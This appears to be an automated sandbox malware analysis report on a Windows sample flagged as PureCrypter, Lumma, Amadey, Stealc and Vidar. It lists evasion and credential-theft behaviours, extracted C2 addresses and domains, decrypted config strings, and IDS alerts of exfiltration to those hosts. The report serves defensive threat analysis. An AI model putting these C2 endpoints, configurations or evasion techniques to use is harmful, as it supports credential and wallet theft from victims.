Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1553576
MD5: 277c62f3813525889d2ae9a5562817b3
SHA1: ed9e5ed56898048706a886b691746016c6627e4b
SHA256: bd1ada988e922b8954c930563166cefceb60ae1c15868fd2a6d3e20ec8fb8e70
Tags: exeuser-Bitsight
Infos:

Detection

PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Detected PureCrypter Trojan
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies windows update settings
Monitors registry run keys for changes
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
PureCrypter According to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter
Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: scriptyprefej.store URL Reputation: Label: malware
Source: http://185.215.113.16/8x Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/fB Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php37 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exeP&/ Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/c4becf79229cb002.php001 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpd Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpg Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/g Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php/X Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phph Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000017.00000002.2554745091.0000000000041000.00000040.00000001.01000000.0000000D.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 26.2.28d9ab8742.exe.d60000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["presticitpo.store", "crisiwarny.store", "necklacedmny.store", "navygenerayk.store", "scriptyprefej.store", "fadehairucw.store", "founpiuer.store", "thumbystriw.store"], "Build id": "4SD0y4--legendaryy"}
Source: file.exe.6404.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 36%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: scriptyprefej.store
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: navygenerayk.store
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: founpiuer.store
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: necklacedmny.store
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: thumbystriw.store
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: fadehairucw.store
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: crisiwarny.store
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: presticitpo.store
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: presticitpo.store
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: lid=%s&j=%s&ver=4.0
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: TeslaBrowser/5.5
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: - Screen Resoluton:
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: - Physical Installed Memory:
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: Workgroup: -
Source: 26.2.28d9ab8742.exe.d60000.0.unpack String decryptor: 4SD0y4--legendaryy
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAE6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6CAE6C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC3A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6CC3A9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC344C0 PK11_PubEncrypt, 0_2_6CC344C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC34440 PK11_PrivDecrypt, 0_2_6CC34440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC04420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6CC04420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6CC825B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC1E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 0_2_6CC1E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC3A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 0_2_6CC3A650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC18670 PK11_ExportEncryptedPrivKeyInfo, 0_2_6CC18670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC5A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 0_2_6CC5A730
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC60180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util, 0_2_6CC60180
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC343B0 PK11_PubEncryptPKCS1,PR_SetError, 0_2_6CC343B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC57C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util, 0_2_6CC57C00
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.6:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49847 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.6:50099 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:50111 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50113 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.50.98.133:443 -> 192.168.2.6:50116 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50119 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50120 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50121 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50124 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50126 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50127 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50131 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.50.98.133:443 -> 192.168.2.6:50135 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50136 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50141 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50143 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50147 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50149 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50151 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50153 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:50155 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50157 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:50165 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50176 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50212 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.79.150.121:443 -> 192.168.2.6:61383 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:61397 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:61454 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2522999551.000000006CB4D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2523239929.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2523239929.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: be33d1b9ea.exe, 00000020.00000003.2930938590.0000000004860000.00000004.00001000.00020000.00000000.sdmp, be33d1b9ea.exe, 00000020.00000002.3064925869.0000000000FA2000.00000040.00000001.01000000.00000010.sdmp, be33d1b9ea.exe, 00000022.00000002.3125430336.0000000000FA2000.00000040.00000001.01000000.00000010.sdmp, be33d1b9ea.exe, 00000022.00000003.3085015043.0000000005400000.00000004.00001000.00020000.00000000.sdmp, be33d1b9ea.exe, 00000025.00000002.3371914234.0000000000FA2000.00000040.00000001.01000000.00000010.sdmp, be33d1b9ea.exe, 00000025.00000003.3331506896.0000000005480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2522999551.000000006CB4D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Directory queried: number of queries: 1294
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49709 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49709 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.6:49709
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49709 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.6:49709
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49709 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:50112 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:59337 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:50167 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:62277 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:54772 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:62545 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.6:58179 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.6:57356 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:50114
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50117 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50123 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50122 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50128 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.6:65221 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:52334 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:62591 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.6:62829 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.6:57896 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:64225 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:49993 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:61456 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.6:63664 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50137 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50150 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:61145 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:49470 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:60758 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057121 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store) : 192.168.2.6:60509 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057101 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store) : 192.168.2.6:59480 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:58183 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057119 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store) : 192.168.2.6:58701 -> 1.1.1.1:53
